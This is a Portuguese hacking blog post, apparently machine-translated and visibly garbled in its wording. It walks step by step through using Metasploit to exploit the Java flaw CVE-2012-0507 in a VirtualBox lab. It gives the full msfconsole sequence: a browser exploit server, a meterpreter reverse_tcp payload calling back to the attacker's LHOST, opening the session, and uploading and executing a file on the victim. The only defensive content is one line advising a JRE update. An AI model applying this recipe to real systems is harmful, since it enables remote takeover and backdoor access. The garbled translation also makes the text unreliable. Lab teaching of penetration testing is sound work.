terça-feira, 15 de janeiro de 2013

Como cortar computador remoto usando Metasploit? Explorando vulnerabilidade Java


Sempre que alguém diz PenTesting ferramenta, a primeira coisa que vem em nossa mente é Metasploit. Hoje, eu estou indo para demonstrar como utilizar a ferramenta Metasploit para explorar o popular java AtomicReferenceArray vulnerabilidade Violação Tipo (CVE-2012-0507).
Sobre o Metasploit :
Metsploit é uma ferramenta muito poderosa PenTesting. Metasploit Framework, uma ferramenta para o desenvolvimento e execução de código de exploração contra uma máquina de destino remoto. O Metasploit Project também é conhecido por ferramentas anti-forenses e evasão, alguns dos quais são construídos no Metasploit Framework. Ferramenta muito útil para coleta de informações, análise de vulnerabilidade, Desenvolvimento Exploit, exploits lado do cliente, ...
Quadro dominar o: Um curso livre de Offensive-Security
A equipe de segurança ofensiva, juntamente com vários membros ativos da comunidade, fez um curso gratuito sobre o "Dominando o quadro" Metasploit Framework. O curso abrange coleta de informações, ataques de engenharia social, explorar o desenvolvimento, evitar Avanço AV e etc ..

O curso está disponível aqui:
www.offensive-security.com/metasploit-unleashed/Introduction

Doações para HFC, alimentar uma criança!
O "Dominando o quadro" é o curso livre. Se você gostou do curso, por favor, doe para Hackers para Caridade (HFC). Além de simplesmente fornecer alimentos para crianças carentes no leste da África, os hackers para o Programa de Alimentação Caridade permite que as crianças e suas famílias para sustentar-se e tornar-se mais auto-suficiente, ensinando-lhes valiosas habilidades agrícolas. Cada centavo recebido é enviado diretamente Hackers para Caridade em apoio da sua missão. Qualquer valor, não importa quão pequeno, faz a diferença, que só leva $ 9,00 para alimentar uma criança durante um mês.

Você pode encontrar mais detalhes sobre a doação aqui:
http://www.offensive-security.com/metasploit-unleashed/Donate

Ei, onde você vai?! Espere um pouco, tomar esse curso Uma vez que eu demonstrar como utilizar o Metasploit. Porque, vai ser difícil de entender ou chato, se você ler essas coisas diretamente.

Requisitos:
  • VirtualBox
  • Alvo OS (janelas, ...)
  • Distro PenTesting (Backtrack)
  • JRE 6 (versão sem patch)

CVE-2012-0507 é uma vulnerabilidade no JRE, devido ao fato de que a implementação da classe AtomicReferenceArray não verificar corretamente se a matriz é de um objeto esperado [tipo]. Um aplicativo Java malicioso ou applet poderia usar esta falha para causar Java Virtual Machine (JVM) para travar ou ignorar as restrições de Java sandbox.

Notícias sobre segurança: Essa vulnerabilidade afeta o Windows, Mac e Linux. No mês passado, malware Flashback infectar mais de 600 mil computadores Mac , explorando essa vulnerabilidade. Recentemente, o INSS , The Amnesty International UK sites injetado com código malicioso, que exploram a CVE-2012-0507.
Eu estou indo para demonstrar esta vulnerabilidade com o VirtualBox. Eu tenho a configuração duas máquinas virtuais ou seja, "Destino" e "BT5". Eu instalei o XP 2 no Target e R2 Backtrack 5 no 'BT5'.

(? Precisam de ajuda para configurar o VM, leia isto: Laboratório de configuração PenTesting ).

Parte I: Preparando o computador de destino:
Inicie o "alvo" da máquina.
Instalar o JRE 6.

Parte II: Preparação da máquina PenTesting:
Agora, começar a BT5.

Abra o terminal e digite "msfupdate". Isto irá atualizar o Metasploit Framework (MSF) com as últimas façanhas e cargas úteis. Como CVE-2012-0507 é o mais recente vulnerabilidade, você tem que atualizar o MSF antes de prosseguir.

conexão lenta de Internet?! Se você tem conexão de internet lenta, então você pode baixar o módulo java_atomicreferencearray sozinho em vez de atualizar todos os módulos.
Faça o download do java_atomicreferencearray.rb e colar nesta pasta "opt/metasploit/msf3/modules/exploits/multi/browser / /"

Então, Download CVE-2012-0507.jar e cole nesta pasta "/ opt/metasploit/msf3/data/exploits /"
Parte III:

Explorando o Java AtomicReferenceArray Vulnerabilidade Violação Tipo:



Etapa 1:
Abra o Terminal e "msfconsole" tipo. Isto irá trazer o console Metasploit, aqui você pode interagir com o MSF.

Etapa 2:
Tipo "use exploit / multi / browser / java_atomicreferencearray". Este comando irá usar o módulo java_atomicreferencearray.rb para o ataque.


Agora digite "mostrar opções" para mostrar as configurações que estão disponíveis e / ou necessários para este módulo específico.



Agora digite "definir SRVPORT 80".
e "definir URIPATH /".



Passo 3: Carga Set
Tipo "cargas Show", essa vontade exibe a lista de cargas. Nós vamos usar o 'reverse_tcp' payload. Esta carga terá conexão TCP inversa do alvo para PenTesting máquina.

Tipo 'set carga java / Meterpreter / reverse_tcp' no console.


definir LHOST [IP_address]: A fim de obter conexão reversa, nós temos que definir o nosso IP no LHOST.

Abra o terminal e "ifconfig" tipo. Isto irá exibir a informação de IP da nossa máquina PenTesting. O IP será "192.168.56.x". Por exemplo, deixe-me dizer o ip é 192.168.56.10.

Agora Digite o msfconsole como "conjunto LHOST 192.168.56.10".



Parte IV: Rompendo a máquina de destino:

Então, você está pronto?! Vamos invadir o computador de destino.

Etapa 1:

Digite "exploit" no msfconsole. Isto irá iniciar o manipulador inversa à nossa máquina e que vai esperar alguém que vai ligar para o servidor HTTP nosso (Ex: http://192.168.56.10). Uma vez vítima ligar para o nosso servidor, ele irá enviar um frasco que vai explorar a vulnerabilidade CVE-2012-0507.

passo 2:

Abra o Firefox / IE na máquina de destino.
Digite "http://192.168.56.10".
Ele carrega nada, mas exploit será executado em segundo plano.
Etapa 3:
Abrir a máquina BT5, ele irá exibir o seguinte resultado:


Agora digite "sessões", isto irá mostrar a lista de sessões ativas.

Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Meterpreter vai ajudar você a interagir / controlar com o Target.



Passo 4: upload de arquivos
Yeeeh ..! temos backdoor na máquina de destino, agora podemos executar comandos no alvo.



Por exemplo, digitando "sysinfo 'irá exibir as informações do sistema.


Você também pode carregar e executar seus próprios arquivos executáveis ​​na máquina de destino.

'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo.

'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.


Dicas de Segurança:
Atualize seu JRE para a versão mais recente.


conclusão:
Espero que este artigo lhe deu uma boa visão como usar Metasploit Framework para explorar a vulnerabilidade Java. Espero que isso irá ajudá-lo a entrar no mundo PenTesting ..!
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86